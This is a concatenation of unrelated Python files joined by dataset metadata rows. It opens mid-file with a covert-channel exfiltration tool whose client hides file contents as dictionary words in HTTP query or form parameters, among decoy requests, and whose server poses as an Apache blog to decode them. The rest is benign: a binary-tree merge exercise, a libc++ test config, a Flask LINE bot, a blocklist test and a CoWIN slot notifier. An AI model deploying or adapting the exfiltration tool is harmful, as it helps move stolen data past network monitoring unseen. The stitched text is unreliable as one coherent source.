'~': 'meat',
' ': 'rub',
'\t': 'tube',
'\n': 'addressing',
'\r': 'corner',
}
RANDOM_WORDS = (
'abortion',
'abuse',
'across',
'addiction',
'adults',
'advantage',
'adventure',
'advertisement',
'advised',
'aids',
'allow',
'altogether',
'amber',
'antivirus',
'antology',
'anxious',
'anybody',
'appear',
'appearance',
'appears',
'applicable',
'approval',
'approve',
'approximately',
'assembly',
'assistant',
'assisted',
'attach',
'attack',
'automatically',
'ave',
'avenue',
'aware',
'bangladesh',
'baseball',
'basketball',
'bend',
'birth',
'blast',
'boat',
'botswana',
'bound',
'box',
'brain',
'brake',
'break',
'breakfast',
'bridge',
'brother',
'brunswick',
'calcium',
'calgary',
'candles',
'carry',
'cast',
'centers',
'chain',
'charge',
'chose',
'chrome',
'classical',
'clips',
'closed',
'clubs',
'codes',
'compared',
'comparison',
'completely',
'compound',
'computing',
'concluded',
'confidence',
'congo',
'constitute',
'contacts',
'counter',
'covers',
'criminal',
'damage',
'decided',
'dedicated',
'define',
'delays',
'delete',
'demonstration',
'des',
'designs',
'desperate',
'determined',
'developer',
'dialog',
'died',
'difference',
'direction',
'disc',
'discounted',
'divine',
'dog',
'dollar',
'domestic',
'draft',
'dream',
'earlier',
'ecology',
'eight',
'electrical',
'element',
'ends',
'enhancement',
'equal',
'evening',
'extended',
'extension',
'exterior',
'facts',
'failure',
'faith',
'falls',
'false',
'felt',
'field',
'fill',
'films',
'flag',
'floor',
'flower',
'follows',
'forces',
'fort',
'funny',
'gamma',
'gene',
'generally',
'glen',
'golden',
'gone',
'governmental',
'graduation',
'graphic',
'greatest',
'greeting',
'harry',
'harvest',
'hawaii',
'headlines',
'health',
'hello',
'hentai',
'holding',
'houston',
'hudson',
'iceland',
'icon',
'identified',
'identify',
'inch',
'indiana',
'indians',
'institutions',
'intensity',
'interactive',
'interim',
'isolated',
'issued',
'jackson',
'jesus',
'justice',
'keeping',
'kinds',
'kong',
'lab',
'land',
'laser',
'leaders',
'leadership',
'legs',
'licenses',
'lighting',
'locally',
'maintain',
'manage',
'manufactured',
'manufacturers',
'matching',
'meeting',
'membrane',
'mental',
'minnesota',
'missing',
'moment',
'moms',
'morocco',
'mothers',
'mouse',
'moved',
'movement',
'named',
'nascar',
'native',
'newport',
'newsletters',
'nuclear',
'objects',
'obtained',
'offering',
'olive',
'oliver',
'ontario',
'opening',
'opinions',
'oregon',
'owned',
'pair',
'pairs',
'pardon',
'parking',
'passed',
'pattern',
'personnel',
'pickup',
'placed',
'plants',
'plastic',
'played',
'pocket',
'pole',
'portable',
'posters',
'powerful',
'prague',
'preservation',
'previews',
'printing',
'priority',
'private',
'procedure',
'produce',
'professionals',
'profit',
'promote',
'quarter',
'quietly',
'racing',
'rain',
'ranges',
'rank',
'reach',
'readers',
'recipes',
'recommendations',
'refused',
'religious',
'removing',
'requests',
'reserve',
'returned',
'russia',
'sacred',
'sailing',
'satisfied',
'savings',
'scored',
'seattle',
'senate',
'sensitivity',
'separate',
'sequence',
'sexual',
'share',
'shield',
'shirts',
'signal',
'single',
'sitemap',
'smiling',
'snow',
'somewhat',
'sorry',
'soul',
'spider',
'sponsor',
'springfield',
'stated',
'statements',
'stats',
'steps',
'stone',
'streaming',
'supper',
'supplied',
'syndicate',
'synthesis',
'tables',
'taxes',
'teams',
'technological',
'theatre',
'tommy',
'tourism',
'trails',
'tried',
'truth',
'turned',
'undefined',
'unemployment',
'utils',
'variable',
'variations',
'venues',
'verizon',
'viewed',
'virus',
'warranty',
'watched',
'weather',
'weekend',
'wellness',
'whenever',
'wholesale',
'williams',
'wisconsin',
'workshop',
'worst',
'writing',
'yesterday',
)
ENCODING_TABLE_INV = {v: k for k, v in ENCODING_TABLE.items()}
VALUES = (
'true',
'false',
'0',
'1',
)
def encode(value):
value = str(value)
result = ''
for c in value:
result += '&{}={}'.format(ENCODING_TABLE[c], random.choice(VALUES))
return result[1:]
def decode(value):
result = ''
words = value.split('&')
for w in words:
try:
result += ENCODING_TABLE_INV[w.split('=')[0]]
        except KeyError:
            break  # unknown word: stop (decoy traffic never starts with a codeword)
return result
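# Round-trip sanity check for the pair above: decode(encode("Hi!")) == "Hi!",
# since every character maps to a unique codeword; a decoy query string whose
# first parameter is not a codeword decodes to "" (decode stops immediately).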
class Server(methods.HTTPServer):
RESPONSE_200 = (
'HTTP/1.1 200 OK\r\n'
'Content-Type: text/html\r\n'
'Access-Control-Allow-Origin: *\r\n'
'Last-Modified: Wed, 01 Jan 2020 00:00:00 GMT\r\n'
'Connection: close\r\n'
'Date: {}\r\n'
'Pragma: no-cache\r\n'
'Content-Length: {}\r\n'
'Server: Apache\r\n\r\n'
)
RESPONSE_404 = (
'HTTP/1.1 404 Not Found\r\n'
'Content-Type: text/html\r\n'
'Access-Control-Allow-Origin: *\r\n'
'Last-Modified: Wed, 01 Jan 2020 00:00:00 GMT\r\n'
'Connection: close\r\n'
'Date: {}\r\n'
'Pragma: no-cache\r\n'
'Content-Length: {}\r\n'
'Server: Apache\r\n\r\n'
)
def response_200(self):
with open('templates/html/blog/article.html') as fil:
content = fil.read()
return self.RESPONSE_200.format(self.date_now_rfc_1123(), len(content)) + content
def response_404(self):
with open('templates/html/blog/404.html') as fil:
content = fil.read()
return self.RESPONSE_404.format(self.date_now_rfc_1123(), len(content)) + content
def handle(self, request, client_address):
data = self.receive(request)
try:
http_request = http.HTTPRequest(data)
except ValueError:
lpz.logger.debug(f'-> Failed to parse: {data}')
else:
encrypted = self.get_payload(http_request)
if encrypted:
decrypted = decode(encrypted).encode('utf8')
if decrypted:
lpz.logger.info(f'-> Encrypted data: {encrypted}')
lpz.logger.info(f'-> Decrypted data: {decrypted}')
self.output_write(decrypted)
else:
lpz.logger.info(f'-> Nothing to decrypt...')
url = urllib.parse.urlparse(http_request.Path)
if url.path == b'/':
request.sendall(self.response_200().encode('utf8'))
else:
request.sendall(self.response_404().encode('utf8'))
lpz.logger.info(f'-> Sent response to {client_address}')
class GETServer(Server):
def get_payload(self, request):
encrypted = None
if request.Method.decode() == 'GET':
encrypted = request.Path.decode()[2:]
return encrypted
class POSTServer(Server):
def get_payload(self, request):
encrypted = None
if request.Method.decode() == 'POST':
encrypted = request.payload.load.decode()
return encrypted
class Client(methods.TCPClient):
CHUNK_SIZE = 10
REQUEST_HTTP = None
EOT = b'\r\n\r\n'
def execute(self):
infile = self.args['infile'].read().decode('utf8')
queue = []
chunks = [infile[i: i + self.CHUNK_SIZE] for i in range(0, len(infile), self.CHUNK_SIZE)]
for chunk in chunks:
lpz.logger.debug(f'Sending "{chunk}"')
            decoy_no = random.randint(1, self.RANDOM_DECOY)  # RANDOM_DECOY presumably comes from the TCPClient base class
for i in range(1, decoy_no):
words = [random.choice(RANDOM_WORDS) for i in range(1, self.CHUNK_SIZE)]
output = '&'.join(['{}={}'.format(w, random.choice(VALUES)) for w in words])
queue.append(output)
queue.append(encode(chunk))
for msg in queue:
self.send(self.prepare_data(msg))
class GETClient(Client):
REQUEST_HTTP = (
'GET /?{} HTTP/1.1\r\n\r\n'
)
def prepare_data(self, data):
return self.REQUEST_HTTP.format(data).encode('utf8')
class POSTClient(Client):
REQUEST_HTTP = (
'POST / HTTP/1.1\r\n'
'Content-Type: application/x-www-form-urlencoded\r\n'
'Content-Length: {}\r\n\r\n'
'{}\r\n\r\n'
)
def prepare_data(self, data):
return self.REQUEST_HTTP.format(len(data), data).encode('utf8')
| 19.079526 | 97 | 0.485012 | 1,073 | 11,276 | 5.05219 | 0.555452 | 0.011068 | 0.003874 | 0.005165 | 0.154031 | 0.145176 | 0.130972 | 0.130972 | 0.130972 | 0.115846 | 0 | 0.012943 | 0.314828 | 11,276 | 590 | 98 | 19.111864 | 0.688713 | 0 | 0 | 0.067029 | 0 | 0 | 0.335669 | 0.013569 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018116 | false | 0.001812 | 0.009058 | 0.003623 | 0.065217 | 0.001812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b89275a0c09b79fb0e333962752c95ab1981d95 | 1,422 | py | Python | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | test.py | itsmahadi007/leet_code | dafbf10c02d163ef69c8bcda26f4f67949e1170e | [
"MIT"
] | null | null | null | # Definition for a binary tree node.
from typing import Optional
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def solver(self, r1, r2):
        if r1 is None and r2 is None:
            return None
if r1 and r2:
root = TreeNode(r1.val + r2.val)
root.left = self.solver(r1.left, r2.left)
root.right = self.solver(r1.right, r2.right)
return root
        elif r1 is None:
            return r2
else:
return r1
def mergeTrees(
self, root1: Optional[TreeNode], root2: Optional[TreeNode]
) -> Optional[TreeNode]:
return self.solver(root1, root2)
# Inorder traversal (left, node, right).
def inorder(node):
if not node:
return
# first recur on left child
inorder(node.left)
    # then print the value of the node
    print(node.val, end=" ")  # fixed: TreeNode stores .val, not .data (AttributeError before)
# now recur on right child
inorder(node.right)
def main():
root1 = TreeNode(1)
root1.left = TreeNode(3)
root1.right = TreeNode(2)
root1.left.left = TreeNode(5)
root2 = TreeNode(2)
root2.left = TreeNode(1)
root2.right = TreeNode(3)
root2.left.right = TreeNode(4)
root2.right.right = TreeNode(7)
s = Solution()
root3 = s.mergeTrees(root1, root2)
print("The Merged Binary Tree is:")
inorder(root3)
main()
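# Sanity check (added note): with the sample trees built in main() above, the
# merged tree's inorder traversal should print: 5 4 4 3 5 7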
| 21.223881 | 66 | 0.585091 | 187 | 1,422 | 4.427807 | 0.31016 | 0.062802 | 0.028986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04264 | 0.307314 | 1,422 | 66 | 67 | 21.545455 | 0.79797 | 0.087201 | 0 | 0 | 0 | 0 | 0.020898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.022727 | 0.022727 | 0.318182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8945c7fa951796c85d83a1615cc0df86de506d | 1,919 | py | Python | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 5 | 2020-12-19T06:56:06.000Z | 2022-01-09T01:28:42.000Z | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 1 | 2021-09-27T06:00:40.000Z | 2021-09-27T06:00:40.000Z | test/libcxx/ndk/test/config.py | AOSiP/platform_external_libcxx | eb2115113f10274c0d25523ba44c3c7373ea3209 | [
"MIT"
] | 14 | 2017-01-21T00:56:32.000Z | 2022-02-24T11:27:38.000Z | import os
import libcxx.test.config
import libcxx.android.test.format
class Configuration(libcxx.test.config.Configuration):
def __init__(self, lit_config, config):
super(Configuration, self).__init__(lit_config, config)
self.cxx_under_test = None
self.cxx_template = None
self.link_template = None
def configure(self):
self.configure_cxx()
self.configure_triple()
self.configure_src_root()
self.configure_obj_root()
self.configure_cxx_library_root()
self.configure_compile_flags()
self.configure_link_flags()
self.configure_features()
def configure_link_flags(self):
self.link_flags.append('-nodefaultlibs')
# Configure libc++ library paths.
self.link_flags.append('-L' + self.cxx_library_root)
# Add libc_ndk's output path to the library search paths.
libdir = '{}/obj/STATIC_LIBRARIES/libc_ndk_intermediates'.format(
os.getenv('ANDROID_PRODUCT_OUT'))
self.link_flags.append('-L' + libdir)
self.link_flags.append('-lc++_ndk')
self.link_flags.append('-lc_ndk')
self.link_flags.append('-lc')
def configure_features(self):
self.config.available_features.add('long_tests')
def get_test_format(self):
cxx_template = ' '.join(
self.compile_flags + ['-c', '-o', '%OUT%', '%SOURCE%'])
link_template = ' '.join(
['-o', '%OUT%', '%SOURCE%'] + self.compile_flags + self.link_flags)
tmp_dir = getattr(self.config, 'device_dir', '/data/local/tmp/')
return libcxx.android.test.format.TestFormat(
self.cxx,
self.libcxx_src_root,
self.obj_root,
cxx_template,
link_template,
tmp_dir,
getattr(self.config, 'timeout', '300'),
exec_env={'LD_LIBRARY_PATH': tmp_dir})
| 33.086207 | 79 | 0.625326 | 227 | 1,919 | 4.986784 | 0.30837 | 0.071555 | 0.080389 | 0.100707 | 0.136926 | 0.060954 | 0.060954 | 0.060954 | 0.060954 | 0.060954 | 0 | 0.002085 | 0.25013 | 1,919 | 57 | 80 | 33.666667 | 0.784573 | 0.045336 | 0 | 0 | 0 | 0 | 0.107709 | 0.02515 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0 | 0.068182 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b898d9bc24faf9e5765013e37fd2996b10a93b4 | 2,341 | py | Python | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | 1 | 2021-01-11T06:56:59.000Z | 2021-01-11T06:56:59.000Z | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | null | null | null | main.py | uncleben006/ptt-stock-vane | f55951eded377cc2f52fb9b98fc57c04b3ead36f | [
"MIT"
] | null | null | null | import json
from controller import follow, postback, message, cron, image
from datetime import datetime
from flask import Flask, request, abort, render_template
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent,
FollowEvent,
PostbackEvent,
TextMessage,
ImageMessage
)
from config import handler
from helper.util import get_comment
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index_html():
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
return '<h1>You have access the server successfully</h1><br>'+dt_string
@app.route('/cron', methods=['GET'])
def cron_job():
print('start a cron job.')
cron.job()
return '<h1>You have finished the cron job successfully</h1>'
@app.route('/comments', methods=['GET'])
def company_comments():
start_date = request.args.get('start_date')
end_date = request.args.get('end_date')
company = request.args.get('company')
with open( 'data/company_dict.json', 'r' ) as read_file:
dict_data = json.load( read_file )
if start_date and end_date:
result = get_comment(start_date, end_date, company)
else:
return "請輸入時間區間"
return render_template( "comments.html", result=result, dict_data=dict_data )
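# Illustrative request for the route above (hypothetical date/company values,
# assuming the default Flask dev server on port 5000):
#   curl 'http://localhost:5000/comments?start_date=2021-01-01&end_date=2021-01-31&company=2330'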
@app.route("/callback", methods=['POST'])
def callback():
# LINE message headers
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
app.logger.info("Request body: " + body)
# handle webhook body
try:
# use the body and signature to verify that the message is legitimate;
# handler.handle also dispatches the event to the downstream business logic
handler.handle( body, signature )
except InvalidSignatureError:
print("Invalid signature. Please check your channel access token/channel secret.")
abort(400)
return 'OK'
@handler.add( MessageEvent, message=TextMessage )
def handle_message(event):
message.handle(event)
@handler.add( MessageEvent, message=ImageMessage )
def handle_image_message(event):
image.handle(event)
@handler.add( FollowEvent )
def handle_follow(event):
follow.handle(event)
@handler.add( PostbackEvent )
def handle_post(event):
postback.handle(event)
if __name__ == "__main__":
app.run() | 25.725275 | 90 | 0.692012 | 300 | 2,341 | 5.26 | 0.383333 | 0.020279 | 0.024715 | 0.039924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00368 | 0.187527 | 2,341 | 91 | 91 | 25.725275 | 0.825973 | 0.064502 | 0 | 0 | 0 | 0 | 0.163004 | 0.019689 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.328125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8b223b7c31de5945dad6e3558f8e2424ffcf2e | 307 | py | Python | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | tests/test_parser.py | threatlead/blocklistde | fe3649fac2a2a59d5fadced1eecfcb2f3b32781c | [
"MIT"
] | null | null | null | from .context import blocklistde
import unittest
class ConnectTestSuite(unittest.TestCase):
def test_ip_list(self):
ip = blocklistde.BlocklistDe.ssh()
self.assertGreater(len(ip), 10, 'Found a total of {0} IP addresses'.format(len(ip)))
if __name__ == '__main__':
unittest.main()
| 21.928571 | 91 | 0.700326 | 38 | 307 | 5.394737 | 0.710526 | 0.04878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011905 | 0.179153 | 307 | 13 | 92 | 23.615385 | 0.801587 | 0 | 0 | 0 | 0 | 0 | 0.130293 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b8c98b7a0da2c7b24385ad368e7947606ef9b7d | 16,016 | py | Python | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | 2 | 2021-05-05T05:07:52.000Z | 2021-05-05T22:35:12.000Z | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | null | null | null | vaccinator.py | vikas-kundu/vaccinator | b2621f6d3fb41b0405e56226a7ce0559f321e766 | [
"MIT"
] | null | null | null | print(r"""
______
<((((((\\\
/ . }\
;--..--._|}
(\ '--/\--' )
\\ | '-' :'|
\\ . -==- .-|
\\ \.__.' \--._
[\\ __.--| // _/'--.
\ \\ .'-._ ('-----'/ __/ \
\ \\ / __>| | '--. |
\ \\ | \ | / / /
\ '\ / \ | | _/ /
\ \ \ | | / /
\ \ \ /
__ __ _____ _____ _____ _ _ _______ ____ _____
\ \ / /\ / ____/ ____|_ _| \ | | /\|__ __/ __ \| __ \
\ \ / / \ | | | | | | | \| | / \ | | | | | | |__) |
\ \/ / /\ \| | | | | | | . ` | / /\ \ | | | | | | _ /
\ / ____ \ |___| |____ _| |_| |\ |/ ____ \| | | |__| | | \ \
\/_/ \_\_____\_____|_____|_| \_/_/ \_\_| \____/|_| \_\
Hasta La Vista Corona...
""")
import smtplib
import ssl
import sys
import re
import time
import json
import argparse
from datetime import date
from datetime import datetime
# Not part of standard lib
import requests as r
from plyer import notification
# Global vars
DEBUG = False
SENT_MAIL_QUEUE = set()
SENT_TELEGRAM_QUEUE = set()
PORT = 587
######### Util functions #########
def debug(data, name):
if DEBUG:
print(f"Data: {data}\nFunction name: {name}\n\n")
def error(err, err_type='normal'):
if err_type == 'critical':
print(f"Error: {err}")
input('Press any key to exit...')
sys.exit()
else:
print(f"Error: {err}")
######### Util functions end #########
######### User input parsing functions #########
def parse():
parser = argparse.ArgumentParser(prog='vaccinator')
parser.add_argument('-p', '--pincode', metavar='Pincode1 Pincode2', type=int, nargs='*', required=False, \
help='Pincode(s) to look for slots.')
parser.add_argument('-a', '--age', metavar='Age', type=int, required=False, default=18, \
help='Age of the user(Default=18).')
parser.add_argument('-d', '--date', metavar='Date', type=str, required=False, default=date.today().strftime('%d-%m-%Y'), \
help='Date from which to start looking(Format=DD-MM-YYYY).')
parser.add_argument('-w', '--wizard', metavar='Wizard', type=bool, nargs='?', required=False, const=True, default=False, \
help='For using user friendly interface')
parser.add_argument('-e', '--email', metavar='Email', type=str, required=False, \
help='Email on which to notify when slots are available')
parser.add_argument('-i', '--interval', metavar='Interval', type=int, required=False, default=300, \
help='Interval in seconds after which to recheck the slots(Default=300).')
parser.add_argument('-s', '--state', metavar='State', type=str, required=False, \
help='State in which to look for slots (use together with --district).')
parser.add_argument('-t', '--district', metavar='District', type=str, required=False, \
help='District in which to look for slots (use together with --state).')
parser.add_argument('--port', metavar='Port', type=int, required=False, default=PORT, \
help=f'Port of the SMTP server(Default={PORT})')
parser.add_argument('--smtp-server', metavar='Smtp Server', type=str, required=False, \
help=f'SMTP Server address to use for sending email.')
parser.add_argument('--sender-email', metavar='Sender email', type=str, required=False, \
help=f'Email of the sender to connect to SMTP server for sending email.')
parser.add_argument('--sender-pass', metavar='Sender pass', type=str, required=False, \
help=f'Password of the sender to connect to SMTP server for sending email.')
parser.add_argument('--bot-token', metavar='Telegram bot token', type=str, required=False, \
help=f'Token of the telegram bot to send messsages.')
parser.add_argument('--bot-chatid', metavar='Telegram bot chatid', type=str, required=False, \
help=f'Chat ID of the telegram bot to send messages.')
args = vars(parser.parse_args())
if not args['state'] and not args['pincode'] and not args['wizard']:
error('Neither --pincode, nor --state with --district entered. So calling wizard...')
args['wizard'] = True
elif not re.search(r"\d{2}\-\d{2}\-\d{4}", args['date']):
error(f"Date {args['date']} is not in DD-MM-YYYY format", 'critical')
return args
def wizard():
output = {'pincode': [], 'age': 18, 'date': date.today().strftime('%d-%m-%Y'), 'email': '', 'state': '', 'district': '', 'interval': 300, \
'smtp_server': '', 'port': PORT, 'sender_email': '', 'sender_pass': '', 'bot_token': '', 'bot_chatid': ''}
print('\nEnter the answer to following questions as asked. If you don\'t know any, skip it by pressing Enter, the default value will be used.\
\nAlso, make sure to enter the email if you wish to be informed when slot is open!\n')
output['pincode'] = str(input('Enter single or multiple picodes separated by space i.e. 1234 1235 1236 (Skip if wish to search by state and district):')).split(' ') or output['pincode']
output['state'] = str(input('Enter state (skip if using pincode):')) or output['state']
output['district'] = str(input('Enter district (skip if using pincode):')) or output['district']
output['age'] = str(input('Enter user age i.e. 23 (Default=18):')) or output['age']
output['date'] = str(input(f"Enter date in DD-MM-YYYY format i.e. 01-02-2021. It is advised to use default date so press Enter(Default={output['date']}):")) or output['date']
output['email'] = str(input('Enter email address to send message when slots found:')) or output['email']
output['interval'] = str(input('Enter interval in which to scan cowin website in seconds (Default=300):')) or output['interval']
output['smtp_server'] = str(input(f'Enter the address of SMTP Server to use for sending emails:')) or output['smtp_server']
output['port'] = str(input(f'Enter the port of SMTP server(Default={PORT}):')) or output['port']
output['sender_email'] = str(input(f'Enter the email to connect to the SMTP Server for sending emails:')) or output['sender_email']
output['sender_pass'] = str(input(f'Enter the password to connect to the SMTP Server for sending emails:')) or output['sender_pass']
output['bot_token'] = str(input(f'Enter the Telegram bot token to send messages:')) or output['bot_token']
output['bot_chatid'] = str(input(f'Enter the Telegram bot chat ID to send messages')) or output['bot_chatid']
if not re.search(r"\d{2}\-\d{2}\-\d{4}", output['date']):
error(f"Date {output['date']} is not in DD-MM-YYYY format", 'critical')
return output
######### User input parsing functions end #########
######## Class starts #############
class vaccinator:
def __init__(self, args):
self.pincode = args['pincode']
self.age = int(args['age'])
self.date = args['date']
self.state = args['state']
self.district = args['district']
def detect(self, data):
output = {self.pincode: []}
if 'error' in data.keys():
error(data['error'])
return output
if data == {'centers': []} or data == {'sessions': []}:
return output
for center in data['centers']:
for session in center['sessions']:
if session['min_age_limit'] <= self.age and session['available_capacity'] > 0:
output[self.pincode].append([f"{center['name']}, {center['block_name']}, {center['district_name']}, {center['state_name']}, {center['pincode']}",\
session['date'], session['slots']])
debug(output, 'detect')
return output
def search_by_state(self):
hdrs={'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"}
did = state_id = 0
res = district_data = ''
states = { 'andaman and nicobar islands': 1, 'andhra pradesh': 2, 'arunachal pradesh': 3, 'assam': 4, 'bihar': 5, 'chandigarh': 6, 'chhattisgarh': 7, 'dadra and nagar haveli': 8, 'daman and diu': 37, 'delhi': 9, 'goa': 10, 'gujarat': 11, 'haryana': 12, 'himachal pradesh': 13, 'jammu and kashmir': 14, 'jharkhand': 15, 'karnataka': 16, 'kerala': 17, 'ladakh': 18, 'lakshadweep': 19, 'madhya pradesh': 20, 'maharashtra': 21, 'manipur': 22, 'meghalaya': 23, 'mizoram': 24, 'nagaland': 25, 'odisha': 26, 'puducherry': 27, 'punjab': 28, 'rajasthan': 29, 'sikkim': 30, 'tamil nadu': 31, 'telangana': 32, 'tripura': 33, 'uttar pradesh': 34, 'uttarakhand': 35, 'west bengal': 36 }
try:
state_id = states[self.state.lower()]
except KeyError:
error('State invalid')
return ''
fetch_districts_url = f"https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}"
try:
res = r.get(fetch_districts_url, headers=hdrs)
except Exception as e:
error(f"Error while fetching district list\n{e}")
return ''
district_data = res.json()
for district in district_data['districts']:
if district['district_name'].lower() == self.district.lower():
did = district['district_id']
if did == 0:
error('District not found!!')
return ''
statewise_url = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id={did}&date={self.date}"
try:
res = r.get(statewise_url, headers=hdrs)
except Exception as e:
error(f"Error while fetching statewise data\n{e}")
return ''
if res.status_code != 200:
error('Response code not ok')
return ''
try:
debug(json.dumps(res.json(), indent = 1), 'search_by_state')
except Exception as e:
error('JSON decode error')
else:
return self.detect(res.json())
return ''
def search_by_pin(self):
hdrs={'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"}
url = f"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode={self.pincode}&date={self.date}"
try:
res = r.get(url, headers=hdrs)
except Exception as e:
error(e)
else:
if res.status_code != 200:
error('Response code not ok')
return ''
try:
debug(json.dumps(res.json(), indent = 1), 'search_by_pin')
except Exception as e:
error('JSON decoder error')
else:
return self.detect(res.json())
return ''
######## Class ends #############
######## Alert functions ########
def desktop_notification(data):
notification.notify(
title = 'vaccinator Slots Found!',
message = data,
timeout = 10
)
def send_email(args, data):
global SENT_MAIL_QUEUE
if not args['email']:
error('No email found to send slot info')
return ''
if not args['smtp_server'] or not args['sender_email'] or not args['sender_pass']:
error('Email options not set properly, cannot send mail')
return ''
if data in SENT_MAIL_QUEUE:
error('Email already sent so skipping it')
return ''
else:
SENT_MAIL_QUEUE.add(data)
message = f"""\
Subject: Some slots have opened up which are as follows:
{data}
******This message was sent by vaccinator script*****"""
smtp_server = args['smtp_server']
port = int(args['port'])
sender_email = args['sender_email']
password = args['sender_pass']
email = args['email']
context = ssl.create_default_context()
try:
server = smtplib.SMTP(smtp_server,port)
server.starttls(context=context) # Secure the connection
server.login(sender_email, password)
server.sendmail(sender_email, email, message)
print('Info: Email sent')
server.quit()
except Exception as e:
error(f"{e}\nUnable to send email.")
server.quit()
def telegram_bot_sendtext(args, message):
global SENT_TELEGRAM_QUEUE
if not args['bot_token'] or not args['bot_chatid']:
error('Telegram bot options not set properly, cannot send telegram message')
return ''
if message in SENT_TELEGRAM_QUEUE:
error('This Telegram message is already sent so skipping it')
return ''
else:
SENT_TELEGRAM_QUEUE.add(message)
send_text = f"https://api.telegram.org/bot{args['bot_token']}/sendMessage?chat_id={args['bot_chatid']}&parse_mode=Markdown&text={message}"
try:
res = r.get(send_text)
except Exception as e:
error(f"Error while sending telegram message {e}")
else:
return res.json()
######## Alert functions end ########
def repeater(args):
location_type = ''
data = {}
messages = ''
run = vaccinator(args)
if args['state']:
location_type = f"State: {args['state']}, District: {args['district']}"
data = run.search_by_state()
if args['pincode']:
location_type = f"Pincode: {args['pincode']}"
data = run.search_by_pin()
if data == {args['pincode']:[]} or not data:
print(f"No slots found for {location_type}")
return ''
sequence = 1
for i in data[args['pincode']]:
messages += f"\n{sequence}. Date: {i[1]}\n Location: {i[0]}\n Slots: {i[2]}"
sequence += 1
messages = f"***Available at {location_type}***{messages}"
return messages
def main():
# Parsing and setting options
cli_args = parse()
all_args = wizard() if cli_args['wizard'] else cli_args
debug(all_args, 'main')
counter = 1
pins = all_args['pincode']
# Infinite loop
while True:
print(f"\n[Time: {datetime.now().strftime('%H:%M:%S')}] Try: [{counter}]")
found = ''
if pins:
for pin in pins :
all_args['pincode'] = pin # To send single pin instead of list
found += repeater(all_args)
else:
found += repeater(all_args)
if found: # Script will keep beeping while waiting if slots are found
############ All alerts #################
print(found)
telegram_bot_sendtext(all_args, found)
if all_args['email']:
send_email(all_args, found)
print('Info: Slots have been found. Exit the program to stop the beeping sound')
desktop_notification(f"Slots available at State: {all_args['state']} or Pincode: {all_args['pincode']}. Check terminal for detailed info.")
for _ in range(1,int(all_args['interval'])):
sys.stdout.write('\a')
sys.stdout.flush()
